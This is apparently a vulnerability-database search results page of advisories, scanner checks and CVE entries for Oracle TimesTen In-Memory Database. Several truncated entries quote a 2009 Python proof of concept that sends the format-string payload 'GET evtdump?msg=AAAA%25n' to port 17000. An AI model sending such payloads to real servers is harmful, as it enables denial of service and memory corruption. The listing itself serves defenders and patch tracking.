22 matches found
EUVD-2010-0898
Malware in sbrugna...
EUVD-2010-0935
Malware in sbrugna...
Oracle TimesTen 22.x < 22.1.1.7.0 Multiple Vulnerabilities (July 2023 CPU)
The version of Oracle TimesTen installed on the remote host is 22.x prior to 22.1.1.7.0. It is, therefore, affected by multiple vulnerabilities as referenced in the July 2023 CPU advisory - Vulnerability in Oracle TimesTen In-Memory Database component: TimesTen IMDB Dell BSAFE Micro Edition Suite...
Oracle TimesTen < 11.2.2.8.65 Buffer Overflow (January 2023 CPU)
The version of Oracle TimesTen installed on the remote host is prior to 11.2.2.8.65. It is, therefore, affected by a buffer overflow vulnerability as referenced in the January 2023 CPU advisory - Vulnerability in Oracle TimesTen In-Memory Database component: In-Memory Database zlib. Supported...
Oracle TimesTen 18.x < 18.1.4.39.0, 22.x < 22.1.1.18.0 Multiple Vulnerabilities (October 2023 CPU)
The version of Oracle TimesTen installed on the remote host is 18.x prior to 18.1.4.39.0 or 22.x prior to 22.1.1.18.0. It is, therefore, affected by multiple vulnerabilities as referenced in the October 2023 CPU advisory: - Security-in-Depth issue in the TimesTen In-Memory Database product of...
Oracle TimesTen In-Memory Database Installed (Windows)
Binary data oracletimestenimdbwininstalled.nbin...
Oracle TimesTen In-Memory Database Installed (Linux / Unix)
Binary data oracletimestenimdbnixinstalled.nbin...
Oracle Critical Patch Update Advisory - July 2010
Oracle Critical Patch Update Advisory - July 2010 Description A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required because of interdependencies by those security patches. Critical Patch Updates are...
CVE-2010-0873
Unspecified vulnerability in the Data Server component in Oracle TimesTen In-Memory Database 7.0.6.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors...
Buffer overflow
Unspecified vulnerability in the Data Server component in Oracle TimesTen In-Memory Database 7.0.6.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors...
Buffer overflow
Unspecified vulnerability in the Data Server component in Oracle TimesTen In-Memory Database 7.0.6.0 and 11.2.1.4.1 allows remote attackers to affect availability via unknown vectors...
CVE-2010-0873
Unspecified vulnerability in the Data Server component in Oracle TimesTen In-Memory Database 7.0.6.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors...
Oracle TimesTen In-Memory Database HTTP Request Denial of Service
Oracle TimesTen In-Memory Database is a product for real-time data management and is used for performance-critical functions in environments like real-time enterprises, telecom, capital markets and defense. A denial of service vulnerability exists in Oracle TimesTen In-Memory Database service. Th...
Oracle TimesTen In-Memory数据库远程拒绝服务漏洞
BUGTRAQ ID: 37522 Oracle TimesTen In-Memory Database是优化了内存的关系数据库系统。 TimesTen In-Memory数据库的timestend守护程序没有正确的处理HTTP请求,远程攻击者可以通过向TCP 17000端口发送超长的HTTP请求导致服务崩溃。 Oracle TimesTen In-Memory Database 7.0.5 厂商补丁: Oracle ------ 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.oracle.com "GET...
Oracle TimesTen In-Memory Database evtdump CGI Module Format String (CVE-2008-5440)
Oracle TimesTen In-Memory Database is a product for real-time data management and is used for performance-critical functions in environments like real-time enterprises, telecom, capital markets and defense. A format string error vulnerability was reported in Oracle TimesTen In-memory Database. Th...
Oracle TimesTen Remote Format String
Oracle TimesTen Remote Format String ==================================== Product Description =================== Oracle TimesTen provides a family of real-time infrastructure software products designed for low latency, high-volume data, event and transaction management. Summary ======= The Oracl...
ZDI-09-004: Oracle TimesTen evtdump Remote Format String Vulnerability
ZDI-09-004: Oracle TimesTen evtdump Remote Format String Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-004 January 14, 2009 -- Affected Vendors: Oracle -- Affected Products: Oracle TimesTen -- TippingPointTM IPS Customer Protection: TippingPoint IPS customers have been protecte...
Oracle TimesTen Remote Format String PoC
No description provided by source. !/usr/bin/python """ Oracle TimesTen Remote Format String Fixed in Oracle CPU Jan 2009 Copyright c Joxean Koret 2009 """ import sys import socket def testPochost: s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connecthost, 17000 buf = "GET...
Oracle Times Ten Format String
!/usr/bin/python """ Oracle TimesTen Remote Format String Fixed in Oracle CPU Jan 2009 Copyright c Joxean Koret 2009 """ import sys import socket def testPochost: s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connecthost, 17000 buf = "GET evtdump?msg=AAAA%25n HTTP/1.0\r\n\r\n" print "Sendin...
Oracle TimesTen - Remote Format String (PoC)
Oracle TimesTen - Remote Format String PoC !/usr/bin/python """ Oracle TimesTen Remote Format String Fixed in Oracle CPU Jan 2009 Copyright c Joxean Koret 2009 """ import sys import socket def testPochost: s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connecthost, 17000 buf = "GET...